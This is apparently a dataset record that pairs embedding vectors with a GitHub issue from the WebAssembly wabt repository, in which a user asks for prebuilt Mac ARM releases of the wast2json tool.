-0.015742015093564987, 0.010389730334281921, 0.019935116171836853, 0.010203688405454159, 0.02286885492503643, 0.002422123681753874, 0.03217095509171486, -0.013516666367650032, 0.013051562011241913, -0.0014516642550006509, 0.014954914338886738, -0.01851833425462246, 0.009123213589191437, 0.0063468944281339645, -0.0036743294913321733, -0.004404186736792326, -0.003354122629389167, -0.03151265159249306, -0.015842191874980927, 0.010082045570015907, 0.010332486592233181, -0.011391494423151016, -0.018504023551940918, 0.013974616304039955, -0.007044551894068718, 0.00423603318631649, 0.01496922504156828, 0.003144825343042612, -0.015455796383321285, 0.010711725801229477, -0.029036862775683403, -0.017230350524187088, 0.011498826555907726, 0.0039033042266964912, -0.015369931235909462, -0.013852973468601704, 0.0049229576252400875, 0.005438150838017464, 0.018704377114772797, -0.01184944435954094, 0.012772498652338982, -0.018389536067843437, -0.008615175262093544, 0.00510899955406785, -0.004504363052546978, 0.012107040733098984, 0.02740541659295559, -0.019634585827589035, -0.0024543232284486294, 0.00017318452592007816, -0.03655009716749191, 0.016285831108689308, -0.0010384363122284412, -0.004926535300910473, -0.03136954456567764, 0.01575632579624653, 0.027476971969008446, 0.0031770248897373676, 0.0017834987957030535, -0.016171343624591827, 0.008379044942557812, -0.013115961104631424, -0.002361302264034748, 0.000984770362265408, 0.006246717646718025, -0.0064828479662537575, -0.012801120989024639, 0.0030482264701277018, 0.016257207840681076, -0.01253636833280325, -0.0029713052790611982, 0.008815528824925423, -0.016328763216733932, -0.005516860634088516, 0.005781612824648619, 0.008729662746191025, -0.00466178311035037, 0.016285831108689308, 0.005785190500319004, 0.0032181688584387302, 0.0020911835599690676, -0.0163860060274601, 0.012164284475147724, 0.009588317945599556, -0.0024722118396312, -0.01651480421423912, 0.007391591556370258, 0.019090771675109863, 0.00014176758122630417, 0.0041859447956085205, 0.011076654307544231, -0.011212607845664024, -0.008379044942557812, 0.0019087193068116903, 0.013037250377237797, -0.005885366816073656, -0.007162617053836584, 0.010718881152570248, 0.020264266058802605, 0.01370986457914114, -0.00410007918253541, -0.011284162290394306, -0.02065066248178482, -0.0069336420856416225, 0.018690064549446106, 0.012686633504927158, -0.004919379949569702, 0.002084028208628297, -0.007720742840319872, -0.007377280853688717, -0.00910174660384655, 0.007491768337786198, -0.002352357842028141, -0.0035151203628629446, -0.025487754493951797, 0.014353855513036251, -0.013810040429234505, 0.013266225345432758, -0.04064302146434784, -0.0033219230826944113, -0.0017888653092086315, -0.033487558364868164, -0.02308351919054985, -0.009960402734577656, 0.020922569558024406, -0.0163860060274601, 0.007713587488979101, -0.005377329420298338, 0.0033755889162421227, 0.014740251004695892, 0.0006793216452933848, 0.022410904988646507, 0.01630014181137085, 0.007828074507415295, -0.029909828677773476, 0.005470350384712219, -0.023369736969470978, 0.009931780397891998, 0.0028550291899591684, 0.01660067029297352, 0.00561345973983407, 0.0015446852194145322, 0.004787003621459007, -0.02083670347929001, -0.0026475207414478064, -0.014869049191474915, 0.010139289312064648, 0.006153696682304144, 0.01874730922281742, -0.007162617053836584, 0.017301905900239944, -0.004175211768597364, -0.0028550291899591684, 0.00685493228957057, -0.005617037415504456, -0.008937171660363674, 0.015742015093564987, -0.012944229878485203, 0.013810040429234505, 0.02189571224153042, 0.0013488044496625662, -0.0054095289669930935, -0.0002468634338583797, -0.016056856140494347, 0.004114390350878239, -0.0024847339373081923, -0.03182749077677727, -0.007971184328198433, -0.00679768854752183, -0.013130271807312965, 0.009552541188895702, -0.012844053097069263, 0.004833514336496592, 0.0028407182544469833, -0.0189476627856493, -0.0326002836227417, 0.012443347834050655, 0.0068334657698869705, 0.01755950227379799, -0.018346603959798813, -0.0033809554297477007, -0.015312687493860722, 0.006024898495525122, -0.0019749074708670378, -0.02149500697851181, -0.0061036087572574615, -0.0189476627856493, 0.012192905880510807, -0.01253636833280325, 0.004987356718629599, -0.0003508412337396294, 0.0065365140326321125, -0.01757381297647953, 0.008107137866318226, -0.007448835298418999, 0.025330333039164543, 0.00630038371309638, 0.015040780417621136, 0.001924819080159068, -0.0007817341829650104, -0.03125505521893501, 0.020593417808413506, -0.003667173907160759, -0.009058814495801926, 0.011162519454956055, 0.020307200029492378, 0.0009874537354335189, -0.020149778574705124, -0.01371701993048191, 0.0018317981157451868, -0.008400511927902699, -0.046310145407915115, -0.0201068464666605, 0.009509608149528503, 0.022296417504549026, 0.00544888386502862, -0.00027459082775749266, 0.012929919175803661, 0.022568324580788612, -0.001435564481653273, -0.005019556265324354, 0.001258466742001474, -0.0008613386889919639, 0.019348368048667908, -0.007763675879687071, 0.011441582813858986, -0.015727704390883446, -0.00425749970600009, 0.01444687694311142, 0.002257548039779067, 0.0005599148571491241, -0.0017414604080840945, -0.006221673917025328, 0.01152744796127081, -0.00947383139282465, -0.0014838638016954064, -0.021752603352069855, -0.012836897745728493, -0.0028693401254713535, 0.010554305277764797, 0.0029265836346894503, 0.006454226095229387, -0.02551637589931488, 0.014940603636205196, 0.00471187150105834, -0.012987162917852402, 0.013001473620533943, -0.010225154459476471, 0.006289650686085224, -0.0027280196081846952, -0.03099745884537697, 0.0026832979638129473, -0.04150167480111122, -0.003007082734256983, 0.017330527305603027, 0.025373267009854317, -0.010425507090985775, -0.002067928435280919, 0.021251721307635307, -0.0182034932076931, 0.021037057042121887, -0.009745738469064236, 0.019863560795783997, 0.0035634199157357216, -0.000682452111504972, -0.009409431368112564, -0.005402373615652323, 0.00377092813141644, 0.016128409653902054, 0.012793964706361294, -0.005316508002579212, 0.007441679947078228, -0.010754658840596676, 0.013237603940069675, -0.012407570146024227, -0.004225300159305334, 0.012786809355020523, 0.002674353774636984, 0.00995324645191431, 0.012056952342391014, -0.017130175605416298, 0.023212317377328873, -0.0083146458491683, -0.006786955054849386, -0.004457852337509394, -0.02478651888668537, 0.023441292345523834, 0.011684868484735489, 0.012085574679076672, 0.009488142095506191, -0.02834993787109852, 0.03188473731279373, 0.008786906488239765, -0.0016117676859721541, -0.008371889591217041, 0.006486425641924143, -0.0017253606347367167, -0.013409335166215897, 0.003055382054299116, 0.012915607541799545, 0.012271616607904434, -0.0269760899245739, 0.00019353287643752992, -0.02741972915828228, -0.003071481827646494, 0.012056952342391014, 0.02880788780748844, -0.024085283279418945, 0.004930112976580858, 0.0016681170091032982, -0.00677622202783823, -0.000202812603674829, 0.03122643381357193, -0.02062203921377659, 0.011155364103615284, -0.0170443095266819, -0.0022843810729682446, 0.0173734612762928, -0.009015881456434727, -0.02095119096338749, 0.0038424828089773655, 0.003338022856041789, -0.017731232568621635, -0.006439915392547846, 0.03091159276664257, -0.012693788856267929, -0.011412961408495903, -0.015799259766936302, 0.007037396542727947, -0.007237749174237251, 0.026332098990678787, -0.007742209360003471, 0.001846109051257372, 0.011198297142982483, -0.012364637106657028, 0.006332583259791136, 0.0249868705868721, -0.01714448630809784, 0.0016305508324876428, 0.018046073615550995, 0.0012128506787121296, 0.003846060484647751, 0.022825922816991806, -0.003642129944637418, 0.0030285490211099386, 0.0002875601057894528, 0.008615175262093544, -0.003906881902366877, -0.012006863951683044, -0.021523628383874893, 0.008729662746191025, 0.0012602556962519884, -0.01169917918741703, -0.000014674285921500996, -0.0030535932164639235, -0.025144292041659355, -0.029881207272410393, 0.03331582993268967, 0.003432832658290863, 0.02583121508359909, -0.021509317681193352, -0.013845818117260933, -0.003166291629895568, 0.005198442842811346, 0.00759910000488162, -0.031484030187129974, 0.015699082985520363, -0.007098217960447073, -0.0018085428746417165, -0.010411196388304234, 0.002847873605787754, -0.005642081145197153, -0.0023952906485646963, 0.006071409210562706, -0.015212510712444782, -0.0033863221760839224, 0.0074202134273946285, 0.012679478153586388, 0.016228586435317993, -0.010597238317131996, -0.018904728814959526, -0.016700847074389458, 0.03821016475558281, -0.0032235353719443083, -0.0003620216157287359, -0.01969183050096035, 0.009574007242918015, 0.0010760024888440967, 0.0001532833994133398, 0.014854737557470798, 0.013638309203088284, -0.021308964118361473, 0.005033866968005896, -0.00932356622070074, -0.0072305938228964806, 0.006189474370330572, -0.008393356576561928, 0.0006399665726348758, -0.006100031081587076, -0.00337380007840693, 0.002128749853000045, 0.00720197195187211, 0.007405902724713087, -0.019505787640810013, -0.0041859447956085205, -0.026060190051794052, 0.01021084375679493, 0.005066066514700651, 0.007055284921079874, 0.0025473441928625107, -0.012500591576099396, -0.02138051949441433, 0.027348173782229424, 0.029766719788312912, -0.012636545114219189, -0.01111243199557066, 0.0007696592947468162, -0.014103414490818977, 0.0028603957034647465, 0.008235936053097248, -0.013581065461039543, 0.007835229858756065, -0.0011126742465421557, 0.004465008154511452, 0.01190668810158968, -0.037093911319971085, -0.03005293756723404, -0.02856460213661194, -0.006035631522536278, 0.0028943840879946947, 0.010747503489255905, -0.006486425641924143, -0.005459616892039776, 0.0036331855226308107, 0.0030428599566221237, -0.009144679643213749, -0.005348707549273968, -0.02105136774480343, 0.0009704594849608839, -0.0021359052043408155, 0.0017629268113523722, 0.004804892465472221, -0.003255734918639064, -0.0013756374828517437, -0.001676166895776987, -0.010633016005158424, 0.0005997171392664313, -0.007878162898123264, 0.01354528870433569, -0.01105518825352192, 0.0072771040722727776, 0.0006976574659347534, 0.006067831534892321, -0.00420741131529212, 0.011183986440300941, 0.012844053097069263, -0.0007446152158081532, -0.0016046122182160616, -0.006790532730519772, 0.004511518403887749, 0.010039112530648708, 0.013137427158653736, -0.02784905582666397, -0.0039498149417340755, 0.0019659630488604307, 0.004522251430898905, -0.005549060180783272, -0.013924527913331985, -0.009938935749232769, -0.015627527609467506, -0.00031484029022976756, -0.012722410261631012, -0.009681339375674725, -0.005835278891026974, 0.0023201582953333855, 0.01863282173871994, 0.01694413274526596, 0.0018622088246047497, 0.010861990042030811, 0.006114341784268618, -0.0027280196081846952, -0.01169917918741703, -0.005169820971786976, -0.014668695628643036, -0.01502646878361702, 0.011133898049592972, -0.021766914054751396, -0.015284066088497639, 0.006951530929654837, 0.0031287255696952343, -0.0008157226257026196, 0.02371319942176342, -0.01992080546915531, 0.009237701073288918, -0.01084767933934927, 0.00754185626283288, 0.006761910859495401, -0.011520292609930038, 0.014840426854789257, -0.004554451443254948, 0.011098120361566544, -0.0031179923098534346, 0.01957734301686287, -0.009523918852210045, 0.006965841632336378, 0.017516570165753365, 0.010132133029401302, 0.0024400122929364443, 0.011212607845664024, 0.021666737273335457, 0.0019087193068116903, -0.028836509212851524, -0.020035292953252792, 0.0009829815244302154, 0.013208981603384018, -0.0009020353318192065, 0.0031484030187129974, -0.017588123679161072, 0.0003090264799539, 0.010554305277764797, 0.007713587488979101, -0.0035473199095577, -0.002296903170645237, -0.00857939850538969, 0.0035938306245952845, -0.020249955356121063, -0.006786955054849386, 0.0007924673845991492, -0.016128409653902054, -0.007441679947078228, 0.004858558531850576, 0.013917372561991215, -0.0026171100325882435, 0.013838662765920162, -0.007391591556370258, -0.008794061839580536, 0.00674760015681386, -0.030739862471818924, 0.010461284779012203, -0.00719481660053134, -0.01519820000976324, 0.0068799760192632675, -0.009874536655843258, -0.025888459756970406, 0.0021502161398530006, 0.02658969536423683, -0.0014301978517323732, -0.016801023855805397, 0.017716921865940094, -0.014253679662942886, -0.005284308455884457, 0.002942683408036828, 0.0039963251911103725, 0.007863852195441723, 0.039641257375478745, 0.0013631153851747513, -0.005921144504100084, -0.018876107409596443, 0.012464813888072968, 0.002819251734763384, -0.0020214179530739784, -0.015713393688201904, 0.017802787944674492, 0.0010509584099054337, 0.012336015701293945, 0.019419921562075615, -0.018561266362667084, 0.013759952038526535, 0.017087241634726524, -0.00669751176610589, -0.01863282173871994, 0.00513762142509222, 0.013216136954724789, 0.00825740210711956, 0.002223559655249119, -0.021037057042121887, 0.00764918839558959, 0.008980103768408298, -0.02032151073217392, -0.015269754454493523, -0.01651480421423912, 0.009581162594258785, -0.00994609110057354, 0.0102179991081357, 0.013287692330777645, -0.020307200029492378, -0.008550776168704033, 0.015441485680639744, -0.011155364103615284, -0.0035330092068761587, 0.006561558227986097, -0.009230545721948147, -0.0005353179876692593, 0.013530978001654148, -0.003924770746380091, -0.015570283867418766, 0.006561558227986097, -0.0249868705868721, -0.002615321194753051, 0.008765440434217453, -0.00017184288299176842, -0.0055097052827477455, -0.011098120361566544, -0.02570241689682007, -0.0002875601057894528, -0.019634585827589035, 0.0064828479662537575, -0.00425749970600009, -0.013681242242455482, -0.0028890175744891167, -0.010554305277764797, -0.00159477349370718, -0.007044551894068718, 0.007019507698714733, -0.002207459881901741, -0.01777416653931141, -0.012321704998612404, 0.003795972326770425, -0.0035741529427468777, 0.024428745731711388, -0.03394550830125809, -0.011420116759836674, -0.003427466144785285, -0.01630014181137085, -0.02773456834256649, -0.014783183112740517, 0.0173734612762928, -0.003397055435925722, -0.019319746643304825, -0.009874536655843258, 0.0025795437395572662, -0.013087338767945766, -0.006168007850646973, -0.010182221420109272, -0.002892595250159502, -0.008743973448872566, -0.02973809838294983, -0.0186185110360384, -0.017072930932044983, 0.02276867814362049, 0.014954914338886738, 0.03091159276664257, 0.0163860060274601, 0.01567045971751213, 0.01535562053322792, 0.02275436744093895, 0.0012718832585960627, 0.0020768726244568825, -0.018046073615550995, 0.003745884168893099, -0.011978242546319962, -0.012285927310585976, -0.002352357842028141, 0.00006512588151963428, 0.014260835014283657, 0.02762008085846901, 0.0027995742857456207, 0.007520390208810568, -0.02741972915828228, -0.017545191571116447, 0.0061501190066337585, -0.002892595250159502, 0.009273477829992771, -0.00043760117841884494, -0.009495297446846962, 0.004354098346084356, 0.005305774509906769, 0.005956921726465225, -0.0001549604639876634, -0.004364831373095512, 0.007370125502347946, 0.008743973448872566, 0.01597099006175995, -0.005974810104817152, 0.0249868705868721, 0.010861990042030811, -0.018174871802330017, 0.010547149926424026, 0.0026707760989665985, -0.00720197195187211, -0.0012262671953067183, -0.019978048279881477, 0.007763675879687071, -0.005574104376137257, -0.018575577065348625, 0.012071263045072556, 0.014997847378253937, -0.0009588318062014878, -0.0005536538083106279, 0.003066115314140916, -0.017387771978974342, 0.010175066068768501, 0.0034864984918385744, -0.01969183050096035, 0.002694031223654747, -0.00036917708348482847, -0.02042168751358986, 0.003622452262789011, 0.005298619158565998, -0.0028908064123243093, -0.011570381000638008, -0.0027494861278682947, -0.005488238763064146, -0.007527545560151339, -0.005062488839030266, 0.017616746947169304, 0.0037745058070868254, 0.0021359052043408155, 0.016128409653902054, -0.007044551894068718, -0.00621451810002327, 0.01026808749884367, -0.005985543597489595, 0.03717977926135063, -0.004833514336496592, 0.009616940282285213, -0.0014570308849215508, -0.012564990669488907, -0.0034220993984490633, -0.016586359590291977, -0.024528922513127327, -0.002148427302017808, 0.01502646878361702, -0.005838856566697359, 0.011620469391345978, -0.0007370125385932624, -0.007030240725725889, -0.009523918852210045, 0.014132036827504635, -0.0032825679518282413, 0.006386249326169491, 0.00474049337208271, 0.016028232872486115, -0.0009946090867742896, -0.003080426249653101, -0.003921193070709705, 0.0035186982713639736, -0.013509511016309261, 0.03586317226290703, 0.008815528824925423, -0.006722555961459875, 0.015284066088497639, 0.007355814334005117, -0.01519820000976324, 0.018174871802330017, 0.0030983148608356714, 0.005101844202727079, 0.0028156740590929985, -0.008336112834513187, 0.013881594873964787, 0.005774457473307848, -0.005341552197933197, -0.015713393688201904, 0.01090492308139801, 0.0019158747745677829, -0.008901393972337246, 0.007180505432188511, 0.011706334538757801, -0.017015688121318817, -0.012951385229825974, 0.02139483019709587, -0.012071263045072556, 0.013065872713923454, -0.0038711046800017357, -0.00457591749727726, 0.03841051831841469, 0.028936685994267464, 0.023784754797816277, -0.006998041179031134, 0.008178692311048508, -0.007785141933709383, -0.006994463503360748, -0.0166292916983366, -0.006550824735313654, 0.0034614545293152332, 0.006368360482156277, -0.006357627455145121, 0.016801023855805397, 0.009294944815337658, -0.012665166519582272, -0.019505787640810013, 0.02243952639400959, 0.0020625616889446974, 0.0033809554297477007, 0.015942368656396866, -0.009824448265135288, -0.0028532403521239758, 0.007828074507415295, 0.00044319138396531343, -0.00943089835345745, -0.01767398975789547, -0.007302148267626762, 0.02889375388622284, 0.017402082681655884, 0.024257013574242592, 0.008972948417067528, -0.007180505432188511, -0.00819300301373005, 0.014954914338886738, 0.011298473924398422, -0.008608019910752773, 0.010446974076330662, 0.02434287965297699, 0.004926535300910473, 0.025673795491456985, 0.0071769277565181255, 0.00915899034589529, 0.017230350524187088, 0.01406763680279255, 0.009194768033921719, 0.029265837743878365, -0.0009221601067110896, -0.01903352700173855, 0.012772498652338982, 0.010289553552865982, 0.019076460972428322, -0.012157129123806953, 0.013108805753290653, 0.0031984911765903234, -0.02794923260807991, -0.004837092012166977, 0.03998471796512604, -0.016457561403512955, -0.009874536655843258, -0.010039112530648708, 0.00999617949128151, 0.0006887131603434682, -0.008479221723973751, 0.023097829893231392, 0.0017924431012943387, -0.00048075756058096886, -0.0014418255304917693, 0.03397412970662117, 0.016572048887610435, 0.03314409777522087, -0.00767781026661396, -0.011248385533690453, 0.024471677839756012, 0.02751990407705307, 0.010139289312064648, -0.011219763197004795, 0.005871056113392115, -0.016858266666531563, -0.00819300301373005, -0.00425749970600009, 0.006472114939242601, 0.0030249713454395533, 0.0008260085596702993, -0.023240938782691956, -0.009595474228262901, 0.00021488744823727757, -0.012035486288368702, 0.0035455310717225075, 0.0021502161398530006, -0.021723980084061623, -0.004196678288280964, -0.0005420261877588928, -0.02457185462117195, -0.006278917659074068, 0.016157031059265137, 0.011148208752274513, -0.034775543957948685, -0.020235644653439522, 0.001398892723955214, 0.002377402037382126, 0.004468585830181837, -0.01280827634036541, 0.015312687493860722, 0.00584601191803813, -0.02285454422235489, -0.014811805449426174, -0.011412961408495903, 0.0007602677796967328, 0.01349520031362772, 0.021967265754938126, -0.0008550776401534677, -0.009173301979899406, -0.00677622202783823, 0.007334347814321518, -0.01449696533381939, -0.018904728814959526, 0.008450600318610668, 0.013523821718990803, 0.0007960450602695346, 0.009774360805749893, -0.01980631798505783, -0.02424270287156105, 0.015455796383321285, -0.0008805689867585897, 0.010761814191937447, 0.007498923689126968, 0.0028264073189347982, -0.008557931520044804, -0.008235936053097248, 0.012901296839118004, -0.00999617949128151, 0.006278917659074068, -0.015928057953715324, -0.004844247363507748, 0.010833368636667728, 0.005269997287541628, -0.001205695210956037, -0.010890612378716469, 0.013352091424167156, -0.005008823238313198, -0.0014874415937811136, 0.0007718954002484679, -0.005438150838017464, 0.0074559906497597694, 0.003329078434035182, 0.01936267875134945, -0.008057049475610256, 0.00033272895961999893, -0.010475595481693745, 0.006647423841059208, 0.010017646476626396, 0.011083809658885002, -0.017602434381842613, -0.004504363052546978, 0.021566560491919518, -0.003982014488428831, -0.006515047512948513, 0.010582927614450455, -0.014003237709403038, 0.023684578016400337, -0.0010035535087808967, -0.0009802982676774263, -0.020922569558024406, 0.026103124022483826, 0.02126603201031685, 0.014768872410058975, -0.0016627503791823983, 0.018360914662480354, 0.002109072171151638, 0.005978388246148825, 0.010361107997596264, -0.04582357406616211, 0.016285831108689308, -0.03523349389433861, 0.008507844060659409, 0.00417878944426775, 0.006357627455145121, 0.012049796991050243, 0.0038532160688191652, -0.012300238013267517, 0.006629534997045994, -0.007227016147226095, -0.007105373311787844, 0.007341503631323576, -0.03354480490088463, -0.0037673504557460546, -0.014654384925961494, -0.0009910314111039042, 0.04570908844470978, -0.006110764108598232, 0.04871438071131706, -0.010289553552865982, 0.03597766160964966, 0.019863560795783997, 0.0001627867459319532, -0.0029337392188608646, 0.013266225345432758, 0.002411390421912074, 0.01864713244140148, 0.012965695932507515, -0.014926292933523655, 0.0011153575032949448, 0.006951530929654837, 0.0027047644834965467, -0.005731524433940649, 0.009674184024333954, -0.017745545133948326, -0.008443444967269897, 0.004039257764816284, -0.005495394580066204, -0.0002417204377707094, 0.030539508908987045, 0.018475402146577835, -0.012579301372170448, 0.016987064853310585, 0.004543717950582504, 0.0008099087863229215, 0.0189476627856493, 0.014160658232867718, -0.028650468215346336, 0.01242903620004654, 0.008944327011704445, -0.006801266223192215, -0.0004033891309518367, 0.009817292913794518, 0.007362969685345888, -0.0250727366656065, 0.008550776168704033, 0.006493581458926201, -0.0022003042977303267, -0.00015674933092668653, -0.016271518543362617, -0.007355814334005117, -0.015627527609467506, -0.0038424828089773655, 0.0013282325817272067, -0.005738680250942707, 0.004629583563655615, 0.0077064321376383305, 0.02657538466155529, 0.0000019635592707345495, 0.0026475207414478064, -0.025044115260243416, -0.002887228736653924, -0.01338786818087101, 0.01445403229445219, 0.0207651499658823, 0.0005339763010852039, -0.016772402450442314, 0.0006663523381575942, 0.0010053423466160893, -0.013237603940069675, 0.009116058237850666, 0.014654384925961494, -0.012879830785095692, 0.01830366998910904, -0.006024898495525122, 0.004937268327921629, -0.018446778878569603, 0.03322996199131012, 0.00847206637263298, -0.010633016005158424, 0.006837043445557356, -0.025459131225943565, -0.007777986582368612, 0.004651050083339214, 0.010303864255547523, -0.006318272557109594, -0.0008121448918245733, 0.0033272895961999893, -0.0151838893070817, -0.0030929481144994497, 0.026618316769599915, -0.0039498149417340755, -0.011277006939053535, -0.011827977374196053, -0.0035383757203817368, 0.003080426249653101, 0.002615321194753051, 0.003427466144785285, 0.003885415615513921, 0.0046796719543635845, -0.008235936053097248, -0.006375516299158335, -0.005624192766845226, -0.01927681267261505, 0.00759910000488162, -0.012851208448410034, 0.011090965010225773, 0.01406763680279255, 0.010525683872401714, 0.0005657286965288222, -0.025530686601996422, 0.016257207840681076, 0.005967654753476381, -0.02075083740055561, -0.011992553249001503, -0.010833368636667728, -0.01587081328034401, -0.002128749853000045, -0.007735054008662701, -0.007785141933709383, -0.014003237709403038, 0.002316580619663, 0.007985495030879974, -0.0018067540368065238, -0.004686827305704355, -0.030253291130065918, 0.014310922473669052, -0.006651001516729593, -0.021022746339440346, -0.0005952449282631278, 0.013480889610946178, -0.005921144504100084, -0.017187418416142464, -0.020178401842713356, -0.0036296078469604254, -0.01705862022936344, 0.027677325531840324, -0.0024632676504552364, -0.010539994575083256, -0.02033582143485546, 0.011928154155611992, 0.014010393992066383, 0.0003166291571687907, 0.0023344692308455706, -0.007792297750711441, 0.006282495334744453, -0.018289359286427498, 0.004468585830181837, -0.002733386354520917, 0.056241925805807114, -0.01811762899160385, -0.0060857199132442474, -0.013051562011241913, 0.010017646476626396, 0.0009472041856497526, -0.005194865167140961, -0.010590082965791225, -0.013581065461039543, 0.012078419327735901, -0.019434234127402306, 0.03380240127444267, 0.010082045570015907, -0.000710626773070544, 0.021638115867972374, 0.0036206634249538183, 0.03188473731279373, 0.00023814270389266312, 0.004078613128513098, -0.008271713741123676, 0.0001857065799413249, -0.027920611202716827, 0.0064005604945123196, -0.0039033042266964912, 0.01032533124089241, -0.017516570165753365, 0.005863900762051344, 0.009795826859772205, -0.001840742421336472, 0.0011287740198895335, -0.02000666968524456, 0.01450412068516016, -0.022482460364699364, 0.016157031059265137, -0.008729662746191025, -0.0024346457794308662, 0.0032217465341091156, -0.010246620513498783, 0.004447119310498238, 0.009767204523086548, 0.028035098686814308, -0.040585778653621674, 0.003055382054299116, 0.02042168751358986, -0.01630014181137085, -0.012114196084439754, -0.018775930628180504, 0.009645561687648296, 0.005989121273159981, -0.020493241026997566, -0.014854737557470798, 0.007287837564945221, 0.0005898783565498888, -0.01608547754585743, -0.000018419723346596584, 0.01449696533381939, 0.002386346459388733, 0.0025419776793569326, 0.000044414173316909, 0.01619996502995491, -0.018690064549446106, 0.006071409210562706, 0.01924819126725197 ]
null
null
null
null
null
null
null
null
null
[ "WebAssembly", "wabt" ]
Hi 👋 and thanks for the great project! For generating the tests of our [Java WASM interpreter](https://github.com/dylibso/chicory) we are relying heavily on `wast2json`, sadly there are no releases for Mac ARM, and people need to recompile this project locally to get a working version of the executable. Do you have any plans to release for Mac ARM?
Mac ARM support
https://api.github.com/repos/WebAssembly/wabt/issues/2366/comments
15
2024-01-12T15:36:26
2024-03-26T15:17:10Z
https://github.com/WebAssembly/wabt/issues/2366
2,079,120,345
2,366
false
This is a GitHub Issue repo:wabt owner:WebAssembly Title : Mac ARM support Issue date: --- start body --- Hi 👋 and thanks for the great project! For generating the tests of our [Java WASM interpreter](https://github.com/dylibso/chicory) we are relying heavily on `wast2json`, sadly there are no releases for Mac ARM, and people need to recompile this project locally to get a working version of the executable. Do you have any plans to release for Mac ARM? --- end body ---
482
[ -0.046165693551301956, 0.016182782128453255, -0.022049902006983757, -0.008724929764866829, 0.030905671417713165, 0.017064228653907776, 0.020259466022253036, 0.044182438403367996, 0.015342655591666698, 0.029418233782052994, 0.00043426669435575604, 0.01025368645787239, 0.0021898404229432344, 0.04021593555808067, -0.01498456858098507, -0.0028319871053099632, -0.017146863043308258, 0.0043245903216302395, -0.014612708240747452, -0.03644225001335144, -0.009902485646307468, 0.014640253968536854, -0.0024291391018778086, 0.008607863448560238, 0.032806288450956345, -0.0026718806475400925, -0.019612155854701996, 0.006438681855797768, -0.03156675770878792, -0.00013191549805924296, -0.00798809714615345, 0.02582358941435814, -0.03853568062186241, 0.002694261260330677, 0.01158274058252573, 0.0015218702610582113, 0.0030730071011930704, 0.05663285404443741, -0.01433725655078888, -0.01848280429840088, -0.02616790495812893, -0.03142903000116348, -0.00030988306389190257, 0.005546906962990761, -0.005798256490379572, 0.009503080509603024, 0.029308052733540535, 0.008931518532335758, 0.0010303612798452377, 0.0085183409973979, -0.007106652017682791, -0.02277984842658043, 0.0030833366326987743, -0.04324590414762497, 0.05514541640877724, -0.025919998064637184, 0.04511897638440132, -0.017477406188845634, 0.024928372353315353, 0.015163611620664597, -0.018772028386592865, 0.010563570074737072, 0.004965015687048435, 0.013421379961073399, 0.01828998699784279, 0.03663506731390953, -0.024900827556848526, 0.05701848492026329, 0.0019522634102031589, 0.010866566561162472, 0.004593155812472105, 0.012078553438186646, -0.008229116909205914, 0.0168851837515831, 0.027586480602622032, -0.03426618129014969, 0.019846288487315178, 0.013510902412235737, 0.03156675770878792, 0.021925948560237885, -0.03798477724194527, 0.0023396171163767576, -0.041180018335580826, -0.004476089030504227, -0.01757381297647953, 0.008359956555068493, -0.04131774231791496, -0.057955022901296616, -0.04600042104721069, -0.011761784553527832, -0.01731213368475437, 0.026787670329213142, -0.014640253968536854, -0.00394584471359849, 0.007058447692543268, 0.022036129608750343, -0.04305308684706688, -0.003501678816974163, -0.0013772581005468965, -0.019956469535827637, -0.0014409562572836876, 0.003005865728482604, 0.005853347014635801, 0.0059015508741140366, -0.029721230268478394, 0.0060668219812214375, 0.032117657363414764, -0.017215726897120476, -0.011927055194973946, 0.03635961562395096, 0.005412624217569828, -0.031346395611763, -0.01586601324379444, -0.045587241649627686, -0.03635961562395096, 0.048093851655721664, -0.013800126500427723, -0.04173092171549797, -0.06307841837406158, 0.017711538821458817, -0.006910392548888922, 0.007753963116556406, -0.015149839222431183, -0.037296149879693985, -0.009069244377315044, -0.016651051118969917, 0.008697384968400002, -0.011878850869834423, 0.0004635334189515561, 0.002127863699570298, -0.023785248398780823, -0.016003739088773727, -0.027434982359409332, -0.04393453523516655, -0.006294069346040487, -0.04514652118086815, 0.0216367244720459, 0.08379238098859787, -0.033715277910232544, -0.013662400655448437, 0.013745035976171494, -0.031401485204696655, 0.01616900973021984, 0.031015852466225624, -0.0002041139523498714, -0.023867882788181305, 0.013772580772638321, 0.01260879822075367, 0.018799573183059692, -0.008456365205347538, 0.021471453830599785, -0.0007265036692842841, 0.031897298991680145, 0.018895981833338737, 0.015728287398815155, 0.005874006077647209, -0.014943250454962254, 0.016100147739052773, 0.010900997556746006, 0.030630219727754593, 0.002952496986836195, 0.004531179089099169, 0.007079106755554676, 0.01017793733626604, -0.03247574716806412, -0.014543845318257809, -0.0015735173365101218, 0.024060700088739395, -0.027448754757642746, 0.001000233693048358, -0.022463079541921616, 0.0033880549017339945, -0.013324972242116928, -0.023000210523605347, -0.04093211144208908, 0.03616679832339287, 0.0008513176580891013, 0.023261889815330505, 0.040188390761613846, -0.038590773940086365, 0.0008569127530790865, 0.008339297957718372, 0.023991836234927177, 0.029500868171453476, 0.004204080440104008, -0.02403315342962742, 0.037599146366119385, -0.00477219931781292, 0.028288882225751877, -0.030106863006949425, 0.009523740038275719, -0.010556683875620365, -0.025933770462870598, -0.022228945046663284, 0.037296149879693985, 0.02016305923461914, -0.023440932855010033, -0.030905671417713165, -0.00813959538936615, 0.013765694573521614, 0.01651332527399063, -0.021237319335341454, 0.018386395648121834, -0.02594754286110401, -0.013256109319627285, 0.0009296492207795382, 0.001817980664782226, 0.010756385512650013, 0.017821719869971275, -0.03137394040822983, -0.02867451310157776, -0.009985120967030525, -0.03355000913143158, -0.029335597530007362, 0.018207352608442307, 0.02221517264842987, 0.03454163298010826, 0.013414493761956692, -0.006734792143106461, 0.010646205395460129, 0.002706312108784914, 0.004235068801790476, -0.01513606682419777, -0.0016191391041502357, -0.02426728792488575, 0.023592431098222733, -0.019391793757677078, -0.013614196330308914, -0.002138193231076002, 0.03886622563004494, 0.03556080535054207, 0.013311199843883514, 0.033412281423807144, 0.016031283885240555, 0.03897640481591225, 0.0021261421497911215, 0.013455811887979507, -0.02700803242623806, -0.002881912514567375, 0.0331643745303154, -0.021292410790920258, -0.006146014202386141, -0.0021571305114775896, -0.04352135583758354, 0.003849436528980732, 0.028702059760689735, -0.021237319335341454, 0.05845083296298981, -0.044485438615083694, 0.020493600517511368, 0.006018618121743202, 0.013565992005169392, -0.001607088022865355, -0.0325583815574646, -0.02476310171186924, 0.01388276182115078, 0.02620922215282917, 0.04164828360080719, 0.022394217550754547, -0.01654087007045746, -0.02465292066335678, -0.011321061290800571, -0.020410966128110886, 0.02722839266061783, 0.004434770904481411, -0.02210499346256256, -0.018303759396076202, 0.012051008641719818, 0.005278341937810183, -0.03826022893190384, 0.031126033514738083, 